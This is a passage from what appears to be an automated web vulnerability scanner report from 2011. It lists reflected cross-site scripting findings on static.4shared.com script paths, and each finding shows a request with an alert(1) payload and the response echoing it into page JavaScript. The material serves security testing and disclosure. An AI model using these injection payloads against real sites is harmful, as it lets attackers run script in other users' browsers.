User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_drag.js5bcb2'-alert(1)-'260d41ae0b6
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B2BFD9E3E55772F60BF018BF682935F1.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:28 GMT
Content-Length: 36160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
oginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/dw_drag.js5bcb2'-alert(1)-'260d41ae0b6',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.173. http://static.4shared.com/js/dw_drag.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_drag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf87f"-alert(1)-"6f121a1eda2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BF6758CFC672FC39672A2E95C372AAFE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:27 GMT
Content-Length: 36160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.174. http://static.4shared.com/js/dw_event.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_event.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19ec2'-alert(1)-'ab4a978f0de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js19ec2'-alert(1)-'ab4a978f0de/dw_event.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js19ec2'-alert(1)-'ab4a978f0de/dw_event.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5994E5EB2F637A57E1C11D6A4814A880.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:16 GMT
Content-Length: 36154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js19ec2'-alert(1)-'ab4a978f0de/dw_event.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.175. http://static.4shared.com/js/dw_event.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_event.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a920"-alert(1)-"365bd27b3c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js7a920"-alert(1)-"365bd27b3c3/dw_event.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js7a920"-alert(1)-"365bd27b3c3/dw_event.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=14ADD58AABB5318B45D845F998D1168A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:15 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js7a920"-alert(1)-"365bd27b3c3/dw_event.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.176. http://static.4shared.com/js/dw_event.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_event.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27f2c"-alert(1)-"68c4ab76dbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA0777C4018C733CAB00C1514B66D2C7.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.177. http://static.4shared.com/js/dw_event.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_event.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2fe7'-alert(1)-'66a1e11a8e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/dw_event.jsb2fe7'-alert(1)-'66a1e11a8e3?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_event.jsb2fe7'-alert(1)-'66a1e11a8e3
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AF5EEC8D5AF4F7E1107B8EE3FF2715BF.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:19 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/dw_event.jsb2fe7'-alert(1)-'66a1e11a8e3',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.178. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_viewport.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9a31"-alert(1)-"63ff542d0f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsb9a31"-alert(1)-"63ff542d0f7/dw_viewport.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jsb9a31"-alert(1)-"63ff542d0f7/dw_viewport.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6A9A71F3EE25BF897A04780FEF001C40.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsb9a31"-alert(1)-"63ff542d0f7/dw_viewport.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.179. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_viewport.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c639'-alert(1)-'53e51cad86f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js2c639'-alert(1)-'53e51cad86f/dw_viewport.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js2c639'-alert(1)-'53e51cad86f/dw_viewport.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=92DA352C34CB4E8F6C01B04E6E661EB8.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:19 GMT
Content-Length: 36169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js2c639'-alert(1)-'53e51cad86f/dw_viewport.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.180. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_viewport.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cec4'-alert(1)-'2afbc9bd6db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/dw_viewport.js2cec4'-alert(1)-'2afbc9bd6db?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_viewport.js2cec4'-alert(1)-'2afbc9bd6db
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E880D7D2419BB33671D2DD782B3A9323.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:22 GMT
Content-Length: 36169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
Box == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/dw_viewport.js2cec4'-alert(1)-'2afbc9bd6db',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.181. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_viewport.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc2d"-alert(1)-"2c2ee3eca79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DFCAF3D03EAF65592088FA7DE98267CF.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:21 GMT
Content-Length: 36169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.182. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_writedrag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1867d'-alert(1)-'df64d9592b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js1867d'-alert(1)-'df64d9592b0/dw_writedrag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js1867d'-alert(1)-'df64d9592b0/dw_writedrag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C52238440BA5EFF4C70E22B0BE686F2A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:26 GMT
Content-Length: 36185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js1867d'-alert(1)-'df64d9592b0/dw_writedrag.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}
...[SNIP]...

1.183. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_writedrag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77c70"-alert(1)-"b6cb32f2907 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js77c70"-alert(1)-"b6cb32f2907/dw_writedrag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js77c70"-alert(1)-"b6cb32f2907/dw_writedrag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B42FB6A3B5C40554B67136CE43B3F3A9.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js77c70"-alert(1)-"b6cb32f2907/dw_writedrag.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.184. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_writedrag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0dfe"-alert(1)-"82ae5dcc5d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FDAEE0E2122E00D757F4E27374A656D.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:29 GMT
Content-Length: 36174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.185. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_writedrag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58167'-alert(1)-'d4bd2c2c303 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/dw_writedrag.js58167'-alert(1)-'d4bd2c2c303?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_writedrag.js58167'-alert(1)-'d4bd2c2c303
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3B5762F5D286068450C695202FC83697.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:30 GMT
Content-Length: 36185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/dw_writedrag.js58167'-alert(1)-'d4bd2c2c303',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.186. http://static.4shared.com/js/index.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a581'-alert(1)-'206a88078d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js4a581'-alert(1)-'206a88078d/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js4a581'-alert(1)-'206a88078d/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8C4AB4F755CF8FAE9653AD5446CB7C4B.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:53 GMT
Content-Length: 36134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js4a581'-alert(1)-'206a88078d/index.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.187. http://static.4shared.com/js/index.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb9c5"-alert(1)-"97dd4e6f4ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jscb9c5"-alert(1)-"97dd4e6f4ff/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jscb9c5"-alert(1)-"97dd4e6f4ff/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44D71914FF632BBB045AD7386A660F6A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jscb9c5"-alert(1)-"97dd4e6f4ff/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.188. http://static.4shared.com/js/index.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93e21"-alert(1)-"78ca177c741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/index.js93e21"-alert(1)-"78ca177c741?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/index.js93e21"-alert(1)-"78ca177c741
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0BDD0F053EB06C78C9916D42FCFFE7AC.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:56 GMT
